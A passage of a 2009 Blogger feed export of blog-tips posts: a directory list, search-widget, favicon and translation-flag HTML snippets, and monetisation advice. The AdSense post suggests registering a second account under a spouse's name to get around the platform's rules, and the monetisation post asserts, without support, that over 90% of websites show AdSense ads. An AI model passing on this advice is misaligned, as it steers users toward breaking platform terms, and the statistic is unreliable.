PR5&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size:85%;"&gt;MavicaNet.com - PR5&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size:85%;"&gt;Greenstalk.com - PR5&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size:85%;"&gt;Smallerbizz.com - PR5&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size:85%;"&gt;Emfind.com - PR5&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size:85%;"&gt;Hoppa.com - PR5&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size:85%;"&gt;prolinkdirectory.com - PR5&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size:85%;"&gt;AllTheBizz.com - PR5&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size:85%;"&gt;Click4Choice.com - PR5&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size:85%;"&gt;Websavvy.cc - PR5&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size:85%;"&gt;iMarvel.com - PR5&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size:85%;"&gt;CyberWebSearch.com - PR5&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size:85%;"&gt;DC2NET.com - PR5&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size:85%;"&gt;cantufind.com - PR5&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size:85%;"&gt;Josh.nu - PR5&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size:85%;"&gt;verajane.com - PR5&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size:85%;"&gt;thewebsite***istant.com - PR5&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size:85%;"&gt;Webs-Best-Directory.com - PR5&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size:85%;"&gt;MyAllFish.com - PR5&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size:85%;"&gt;Yeandi.com - PR5&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size:85%;"&gt;Bontonic.com - PR5&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size:85%;"&gt;AllFreeThings.comR5&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size:85%;"&gt;fitnesspros.net - PR5&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size:85%;"&gt;SmartLinks.org - PR5&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size:85%;"&gt;charolabap.com - PR5&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size:85%;"&gt;money-talk.org/directory - PR5&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size:85%;"&gt;cgbee.com - PR5&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size:85%;"&gt;findsome.info - PR5&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size:85%;"&gt;wordforums.net - PR5&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size:85%;"&gt;xoron.com - PR5&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size:85%;"&gt;csdir.org - PR4&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size:85%;"&gt;findingblog.com - PR4&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-size:85%;"&gt;linkaddurl.com - PR4&lt;/span&gt;&lt;/li&gt;&lt;/ol&gt;It may take a long time before you can see the results (usually 2-3 months).&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4284377048633026062-230766206298508657?l=infinitytricks.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://infinitytricks.blogspot.com/feeds/230766206298508657/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4284377048633026062&amp;postID=230766206298508657' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/230766206298508657'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/230766206298508657'/><link rel='alternate' type='text/html' href='http://infinitytricks.blogspot.com/2009/07/submit-your-blog-to-high-pagerank.html' title='Submit your blog to High PageRank Directories.'/><author><name>Lovana das</name><uri>http://www.blogger.com/profile/03880679332199590678</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4284377048633026062.post-8771598107406774272</id><published>2009-07-28T00:45:00.013-07:00</published><updated>2009-07-28T00:45:55.303-07:00</updated><title type='text'>How to add search form widget to Blogger ?</title><content type='html'>Many Bloggers do not like the default navbar at the top, and &lt;a href="http://free-blogger-help.blogspot.com/2008/08/how-to-remove-default-top-navbar-from.html"&gt;remove it from their template&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;But in the process they lose the search form available with the navbar.It is very useful for a reader to  search whatever he wants in your blog.&lt;br /&gt;&lt;br /&gt;Now you can add the search form widget to your Blogger blog,by clicking on the following button.&lt;form method="post" action="http://www.blogger.com/add-widget"&gt;&lt;br /&gt;&lt;input name="widget.title" value="Search" type="hidden"&gt;&lt;br /&gt;&lt;input name="widget.content" value="&amp;lt;form id=&amp;quot;searchThis&amp;quot; action=&amp;quot;/search&amp;quot; style=&amp;quot;display:inline;&amp;quot; method=&amp;quot;get&amp;quot;&amp;gt;&amp;lt;input id=&amp;quot;searchBox&amp;quot; name=&amp;quot;q&amp;quot; type=&amp;quot;text&amp;quot;/&amp;gt; &amp;lt;input id=&amp;quot;searchButton&amp;quot; value=&amp;quot;Go&amp;quot; type=&amp;quot;submit&amp;quot;/&amp;gt;&amp;lt;/form&amp;gt;&amp;lt;br/&amp;gt; &amp;lt;br/&amp;gt;&amp;lt;span style='font-size: 80%'&amp;gt;Blogger Widget by &amp;lt;a href='http://free-blogger-help.blogspot.com/'&amp;gt;Free Blogger Help &amp;lt;/a&amp;gt;&amp;lt;/span&amp;gt;" type="hidden"&gt;&lt;br /&gt;&lt;input name="go" value="Add Search Form Widget to Your Blog" type="submit"&gt;&lt;/form&gt;&lt;br /&gt;On clicking the above button you will be directed to Add Widget page.Just select the blog where you want to put this widget and click 'Add Widget'.&lt;br /&gt;&lt;br /&gt;That's it you have successfully added a 'Search Form' widget to your Blogger blog.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4284377048633026062-8771598107406774272?l=infinitytricks.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://infinitytricks.blogspot.com/feeds/8771598107406774272/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4284377048633026062&amp;postID=8771598107406774272' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/8771598107406774272'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/8771598107406774272'/><link rel='alternate' type='text/html' href='http://infinitytricks.blogspot.com/2009/07/how-to-add-search-form-widget-to.html' title='How to add search form widget to Blogger ?'/><author><name>Lovana das</name><uri>http://www.blogger.com/profile/03880679332199590678</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4284377048633026062.post-8990852254136763120</id><published>2009-07-28T00:45:00.011-07:00</published><updated>2009-07-28T00:45:54.128-07:00</updated><title type='text'>How to add a favicon to a Blogger blog ?</title><content type='html'>Favicon - it stands for "favourite icon".&lt;br /&gt;&lt;br /&gt;&lt;b&gt;What is a favicon ?&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;It is a small icon which appears next to the website address in the address bar of your browser.&lt;br /&gt;&lt;br /&gt;&lt;img src="http://drraman007.googlepages.com/fav.JPG" /&gt;&lt;br /&gt;&lt;br /&gt;I acts like an identification for your url.Users can easily find the tab with your site from this favicon if they have opened many tabs.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;How to add a Favicon to your Blogger blog?&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;Here is step-by-step guide for that -&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;STEP I - &lt;/span&gt; First of all you need to have an icon which can be used as a favicon.You can create a favicon from any image of your choice &lt;a href="http://www.html-kit.com/favicon/"&gt;here&lt;/a&gt;.&lt;br /&gt;     At this site you can also create an animated favicon like the one I am having here for my blog.Just download the file after you have done.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;STEP II - &lt;/span&gt; Now from downloaded zip file upload a .png file(or .gif for animated favicon) to your favourite photosharing site.You can also upload it at &lt;a href="http://pages.google.com/"&gt;Googlepages&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;STEP III -&lt;/span&gt;  Now copy the following code -&lt;br /&gt;&lt;blockquote&gt;&amp;lt;link href='&lt;b&gt;&lt;span style="color: rgb(61, 133, 198);"&gt;URL of your favicon image&lt;/span&gt;&lt;/b&gt;' rel='shortcut icon'/&amp;gt;&lt;/blockquote&gt;Replace &lt;b&gt;&lt;span style="color: rgb(61, 133, 198);"&gt;URL of your favicon image&lt;/span&gt; &lt;/b&gt;in the code with your favicon image url.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;STEP IV - &lt;/span&gt;Now goto &amp;gt; Dashboard &amp;gt; Layout &amp;gt; Edit Html &amp;gt; Expand Widget Templates.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;STEP V - &lt;/span&gt; Place the code below - &amp;lt;head&amp;gt;&lt;br /&gt;&lt;br /&gt;Save your template and you are done.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4284377048633026062-8990852254136763120?l=infinitytricks.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://infinitytricks.blogspot.com/feeds/8990852254136763120/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4284377048633026062&amp;postID=8990852254136763120' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/8990852254136763120'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/8990852254136763120'/><link rel='alternate' type='text/html' href='http://infinitytricks.blogspot.com/2009/07/how-to-add-favicon-to-blogger-blog.html' title='How to add a favicon to a Blogger blog ?'/><author><name>Lovana das</name><uri>http://www.blogger.com/profile/03880679332199590678</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4284377048633026062.post-7091767832290776854</id><published>2009-07-28T00:45:00.009-07:00</published><updated>2009-07-28T00:45:52.849-07:00</updated><title type='text'>How to make money with your Blogger blog ?</title><content type='html'>Though some bloggers write blog just as a passion and not for money while many others are looking towards it as a profession and a good source of income. Many bloggers had quit their earlier jobs and took blogging as their full-time profession.&lt;br /&gt;&lt;br /&gt;After setting a blog and getting some good traffic now it's time to make some money from your Blogger blog.&lt;br /&gt;&lt;br /&gt;Here are some ways by which you can monetize your Blogger blog -&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;font-size:130%;" &gt;I. Showing Contextual Ads -&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;This is the most commonly used method of earning from a blog.Lots of bloggers are making thousands of dollars with this method.&lt;br /&gt;&lt;br /&gt;In a broad sense, contextual ads are , 'ads related to the text material on your blog'. A contextual ads system scans the text of a wbpage for keywords and depending upon the keyword density displays ads on that pages.&lt;br /&gt;e.g. if your blog is about games, you will get ads like - free games, game reviews etc.&lt;br /&gt;&lt;br /&gt;Here you are paid for each click, hence also called as Pay Per Click i.e PPC ads.&lt;br /&gt;&lt;br /&gt;Their are many networks showing contextuals ads, but I'll list some important players only -&lt;br /&gt;&lt;br /&gt;&lt;a href="https://www.google.com/adsense/"&gt;&lt;span style="font-weight: bold;"&gt;1. Google Adsense - &lt;/span&gt;&lt;/a&gt;Father of all contextual advertising networks, more than 90% of webstites dispays Google Adsense ads.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.kontera.com/"&gt;&lt;span style="font-weight: bold;"&gt;2. Kontera - &lt;/span&gt;&lt;/a&gt;This can be used alongwith Gooogle Adsense on same site. This is a better option as an Adsense supplement. Being inline ads consumes no space on your blog.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;&lt;a href="http://www.adbrite.com/"&gt;3. Adbrite -&lt;/a&gt; &lt;/span&gt;Most common alternative for those banned from Google, but earnings can be quite low when compared to Google Adsense.( you just can't risk getting banned from Adsense.)&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;&lt;a href="http://www.bidvertiser.com/"&gt;4. Bidvertiser -&lt;/a&gt; &lt;/span&gt;Again an alternative for those banned from Google Adsense, very less chances that your ads inventory will be full, again earnings not that good.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.widgetbucks.com/"&gt;&lt;span style="font-weight: bold;"&gt;5. WidgetBucks - &lt;/span&gt;&lt;/a&gt;Visually good ads but get very less clicks hence less revenue.Some bloggers (including me) consider it a scam.&lt;br /&gt;&lt;br /&gt;Others about which I've heard only once or twice are - &lt;a href="http://www.blogger.com/www.clicksor.com"&gt;Clicksor&lt;/a&gt;, &lt;a href="http://www.pepperjamnetwork.com/"&gt;PepperjamNetwork&lt;/a&gt; , etc.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;font-size:130%;" &gt;II. Affiliate Marketing - &lt;/span&gt;&lt;br /&gt;&lt;br /&gt;If the blogger have required skills then he can earn a lot with Affiliate Marketing.Beacause I am myself not that successful with affiliate marketing i'll not talk much about it.&lt;br /&gt;&lt;br /&gt;But i'll give some basic idea about it. According to wikipedia, Affiliate marketing is -&lt;blockquote&gt;Affiliate marketing is an Internet-based marketing practice in which a business rewards one or more affiliates for each visitor or customer brought about by the affiliate's marketing efforts.&lt;/blockquote&gt;In simple words - you sell some products on your site and get some commission on each sale.&lt;br /&gt;&lt;br /&gt;Some important Affiliate Marketing networks are -&lt;br /&gt;&lt;ol&gt;&lt;li&gt;&lt;a href="http://www.cj.com/"&gt;Commission Junction&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="http://www.clickbank.com/index.html"&gt;ClickBank&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="http://www.azoogleads.com/corp/index.php"&gt;Azoogle&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="http://affiliate-program.amazon.com/gp/associates/join"&gt;Amazon&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="http://chitika.com/"&gt;Chitika&lt;/a&gt;&lt;/li&gt;&lt;/ol&gt;&lt;span style="font-weight: bold;font-size:130%;" &gt;III. Selling Text Links -&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;If your blog is having a good Google PageRank (&gt;3) and also some good traffic then you can earn good money for placing the text-links on your blog.&lt;br /&gt;&lt;br /&gt;But I would like to warn you that Google is strictly  against selling text-links on your blogs/sites.It may fine you by decrasing your PR or even removing your site from their search-engine results(biggest example is John Chow), if Google notices it or somebody informs Google about this.So think twice befor selling text links on your blog.&lt;br /&gt;&lt;br /&gt;Even though there is a risk, it can make some good add-on revenue for your adsense monetized blog, without taking much space on your blog&lt;br /&gt;&lt;br /&gt;If you would like to take some risk, here are some networks -&lt;br /&gt;&lt;ol&gt;&lt;li&gt;&lt;a href="http://www.text-link-ads.com/"&gt;Text Link Ads&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="http://www.linkworth.com/"&gt;LinkWorth&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="http://tnx.net/"&gt;TNX&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="http://www.textlinkbrokers.com/"&gt;Text Link Brokers&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="http://www.linkadage.com/"&gt;Link Adage&lt;/a&gt;&lt;/li&gt;&lt;/ol&gt;&lt;span style="font-weight: bold;font-size:130%;" &gt;IV.Writing Reviews about other blogs -&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;This also a common method not liked by Google and get you banned from Google Search Results.&lt;br /&gt;&lt;br /&gt;But if are adding a "rel=nofollow" attribute to your clients link, then Google have no problem with it.&lt;br /&gt;&lt;br /&gt;Here are some big players -&lt;br /&gt;&lt;ol&gt;&lt;li&gt;&lt;a href="http://payperpost.com/"&gt;Pay Per Post&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="http://www.sponsoredreviews.com/"&gt;Sponsored Review&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="http://www.reviewme.com/"&gt;Review Me&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="http://www.bloggerwave.com/"&gt;Bloggerwave&lt;/a&gt;&lt;/li&gt;&lt;/ol&gt;&lt;span style="font-size:130%;"&gt;&lt;span style="font-weight: bold;"&gt;V. Showing CPM ads -&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Here you need not require clicks for earning money, you are paid just for showing these cpm ads.&lt;br /&gt;&lt;br /&gt;But bad news is many leading cpm networks do not accept domains with *.blogspot.com , they want their own doamin.&lt;br /&gt;&lt;br /&gt;Hence if you are hosting your blog on custom domain, here list of top cpm ads networks -&lt;br /&gt;&lt;ol&gt;&lt;li&gt;&lt;a href="http://www.tribalfusion.com/"&gt;Tribal Fusion&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="http://www.burstmedia.com/"&gt;Burst Media&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="http://direct.rightmedia.com/"&gt;Right Media&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="http://www.adsdaq.com/"&gt;Adsdaq&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="http://www.casalemedia.com/"&gt;Casale Media&lt;/a&gt;&lt;/li&gt;&lt;/ol&gt;(Get more information about top CPM ads network&lt;a href="http://webmasters-forum.org/showthread.php?t=22"&gt; here.&lt;/a&gt;)&lt;br /&gt;&lt;br /&gt;If you want to add anything more just comment it and i'll update the post if required.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4284377048633026062-7091767832290776854?l=infinitytricks.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://infinitytricks.blogspot.com/feeds/7091767832290776854/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4284377048633026062&amp;postID=7091767832290776854' title='2 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/7091767832290776854'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/7091767832290776854'/><link rel='alternate' type='text/html' href='http://infinitytricks.blogspot.com/2009/07/how-to-make-money-with-your-blogger.html' title='How to make money with your Blogger blog ?'/><author><name>Lovana das</name><uri>http://www.blogger.com/profile/03880679332199590678</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4284377048633026062.post-1596887588264191550</id><published>2009-07-28T00:45:00.007-07:00</published><updated>2009-07-28T00:45:51.780-07:00</updated><title type='text'>How to add language translation flags script to Blogger blog ?</title><content type='html'>Though most of the blogs are written in English, it is not the sole language used over internet. Many people think Chinese is more commonly spoken than English.&lt;br /&gt;&lt;br /&gt;So if you want to get readers using different languages other than English , you will definitely like to add a Language translation script to your Blogger blog.&lt;br /&gt;&lt;br /&gt;Here's how you can add this -&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;STEP I - &lt;/span&gt;Copy the foolowing code or get it from the &lt;a href="http://free.blogger.help.googlepages.com/translate.txt"&gt;text file here&lt;/a&gt;.&lt;blockquote&gt;&amp;lt;form action="http://www.google.com/translate"&amp;gt;&lt;br /&gt;&lt;br /&gt;&amp;lt;script language="javascript" type="text/javascript"&amp;gt;&lt;br /&gt;&lt;br /&gt;&amp;lt;!--&lt;br /&gt;&lt;br /&gt;document.write ("&amp;lt;input name=u value="+location.href+" type=hidden&amp;gt;")&lt;br /&gt;&lt;br /&gt;// --&amp;gt;&lt;br /&gt;&lt;br /&gt;&amp;lt;/script&amp;gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&amp;lt;noscript&amp;gt;&amp;lt;input value="&lt;span style="color: rgb(0, 102, 0); font-weight: bold;"&gt;http://free-blogger-help.blogspot.com/&lt;/span&gt;" name="u" type="hidden"/&amp;gt;&amp;lt;/noscript&amp;gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&amp;lt;input value="en" name="hl" type="hidden"/&amp;gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&amp;lt;input value="UTF8" name="ie" type="hidden"/&amp;gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&amp;lt;input value="" name="langpair" type="hidden"/&amp;gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&amp;lt;input onclick="this.form.langpair.value=this.value" title="Arabic" value="en|ar" type="image" height="30" src="http://photos1.blogger.com/x/blogger2/6075/564571464515337/1600/z/358406/gse_multipart12399.png" width="40" name="langpair"/&amp;gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&amp;lt;input onclick="this.form.langpair.value=this.value" title="&amp;amp;#20013;&amp;amp;#25991;&amp;amp;#65288;&amp;amp;#31616;&amp;amp;#20307;&amp;amp;#65289;/Chinese (Simplified)" value="en|zh-CN" type="image" height="30" src="http://photos1.blogger.com/x/blogger2/6075/564571464515337/1600/z/546049/gse_multipart12397.png" width="40" name="langpair"/&amp;gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&amp;lt;input onclick="this.form.langpair.value=this.value" title="&amp;amp;#20013;&amp;amp;#25991;&amp;amp;#65288;&amp;amp;#32321;&amp;amp;#20307;&amp;amp;#65289;/Chinese (Traditional)" value="en|zh-TW" type="image" height="30" src="http://photos1.blogger.com/x/blogger2/6075/564571464515337/1600/z/208681/gse_multipart12398.png" width="40" name="langpair"/&amp;gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&amp;lt;input onclick="this.form.langpair.value=this.value" title="Fran&amp;amp;#231;ais/French" value="en|fr" type="image" height="30" src="http://photos1.blogger.com/x/blogger2/6075/564571464515337/1600/z/327620/gse_multipart12413.png" width="40" name="langpair"/&amp;gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&amp;lt;input onclick="this.form.langpair.value=this.value" title="Deutsch/German" value="en|de" type="image" height="30" src="http://photos1.blogger.com/x/blogger2/6075/564571464515337/1600/z/734899/gse_multipart12400.png" width="40" name="langpair"/&amp;gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&amp;lt;input onclick="this.form.langpair.value=this.value" title="Italiano/Italian" value="en|it" type="image" height="30" src="http://photos1.blogger.com/x/blogger2/6075/564571464515337/1600/z/306145/gse_multipart12401.png" width="40" name="langpair"/&amp;gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&amp;lt;input onclick="this.form.langpair.value=this.value" title="&amp;amp;#26085;&amp;amp;#26412;&amp;amp;#35486;/Japanese" value="en|ja" type="image" height="30" src="http://photos1.blogger.com/x/blogger2/6075/564571464515337/1600/z/443122/gse_multipart12402.png" width="40" name="langpair"/&amp;gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&amp;lt;input onclick="this.form.langpair.value=this.value" title="&amp;amp;#54620;&amp;amp;#44397;&amp;amp;#50612;/Korean" value="en|ko" type="image" height="30" src="http://photos1.blogger.com/x/blogger2/6075/564571464515337/1600/z/581031/gse_multipart12403.png" width="40" name="langpair"/&amp;gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&amp;lt;input onclick="this.form.langpair.value=this.value" title="Portugu&amp;amp;#234;s/Portuguese" value="en|pt" type="image" height="30" src="http://photos1.blogger.com/x/blogger2/6075/564571464515337/1600/z/670301/gse_multipart12404.png" width="40" name="langpair"/&amp;gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&amp;lt;input onclick="this.form.langpair.value=this.value" title="&amp;amp;#1056;&amp;amp;#1091;&amp;amp;#1089;&amp;amp;#1089;&amp;amp;#1082;&amp;amp;#1080;&amp;amp;#1081;/Russian" value="en|ru" type="image" height="30" src="http://photos1.blogger.com/x/blogger2/6075/564571464515337/1600/z/111692/gse_multipart12405.png" width="40" name="langpair"/&amp;gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&amp;lt;input onclick="this.form.langpair.value=this.value" title="Espa&amp;amp;#241;ol/Spanish" value="en|es" type="image" height="30" src="http://photos1.blogger.com/x/blogger2/6075/564571464515337/1600/z/998398/gse_multipart12407.png" width="40" name="langpair"/&amp;gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&amp;lt;/form&amp;gt;&lt;/blockquote&gt;Replace the characters in bold green with your blog's url.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;STEP II -&lt;/span&gt; Now Goto &gt; Dashboard &gt; Layout &gt; Add  Gadget &gt; HTML/Javascript.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;STEP III - &lt;/span&gt;Place the above code in text field and 'Save'.&lt;br /&gt;&lt;br /&gt;Check your blog, it looks like as follows -&lt;br /&gt;&lt;br /&gt;&lt;img src="http://free.blogger.help.googlepages.com/traaaa.JPG" /&gt;&lt;br /&gt;&lt;br /&gt;That's it you have successfully added the Language Translation Falgs and Script to your blog.&lt;br /&gt;&lt;br /&gt;Feel free to leave a comment if you have any difficulty.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4284377048633026062-1596887588264191550?l=infinitytricks.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://infinitytricks.blogspot.com/feeds/1596887588264191550/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4284377048633026062&amp;postID=1596887588264191550' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/1596887588264191550'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/1596887588264191550'/><link rel='alternate' type='text/html' href='http://infinitytricks.blogspot.com/2009/07/how-to-add-language-translation-flags.html' title='How to add language translation flags script to Blogger blog ?'/><author><name>Lovana das</name><uri>http://www.blogger.com/profile/03880679332199590678</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4284377048633026062.post-6505784584914091133</id><published>2009-07-28T00:45:00.005-07:00</published><updated>2009-07-28T00:45:50.837-07:00</updated><title type='text'>Can I have two adsense account of same name and or address and or e mail ID ?</title><content type='html'>I am using Google adsense from nearly 9 months.  Now I wonder if can I have two adsense account of same name and or address and or e mail ID ? Then I done some search and research for this question.&lt;br /&gt;&lt;br /&gt;You can have two adsense accounts but in two different names. Your first name should be different and you can keep last name that is surname . You can use your wife or husbands name.&lt;br /&gt;e.g. John Clinton&lt;br /&gt;       Jane Clinton&lt;br /&gt;&lt;br /&gt;In this case you can keep same postal address but different e mail ID .&lt;br /&gt;&lt;br /&gt;What will happen when you use same first name and last name , address and same e mail ID  ... definitely you will be BANNED by Adsense .&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4284377048633026062-6505784584914091133?l=infinitytricks.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://infinitytricks.blogspot.com/feeds/6505784584914091133/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4284377048633026062&amp;postID=6505784584914091133' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/6505784584914091133'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/6505784584914091133'/><link rel='alternate' type='text/html' href='http://infinitytricks.blogspot.com/2009/07/can-i-have-two-adsense-account-of-same.html' title='Can I have two adsense account of same name and or address and or e mail 